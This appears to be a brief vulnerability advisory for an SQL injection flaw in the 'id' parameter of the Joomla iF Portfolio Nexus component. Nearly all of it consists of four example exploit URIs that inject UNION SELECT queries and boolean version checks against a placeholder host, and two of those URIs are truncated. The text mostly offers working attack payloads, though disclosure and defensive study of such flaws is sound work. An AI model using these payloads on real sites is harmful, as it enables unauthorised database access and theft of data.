Joomla! iF Portfolio Nexus Component 'id' Parameter SQL Injection Vulnerability

Joomla! iF Portfolio Nexus Component 'id' Parameter SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URIs are available:

http://www.example.com/services/portfolio?view=item&id=-100%20union%20all%20select%201,version%28%29,3,4,5,6,7,

http://www.example.com/services/portfolio?controller=sections&view=item&id=-71%20union%20all%20select%201,2,ver

http://www.example.com/services/portfolio?controller=sections&view=item&id=71%20and%20substring%28@@version,1,1%29=5

http://www.example.com/services/portfolio?view=item&id=100 and substring(@@version,1,1)=5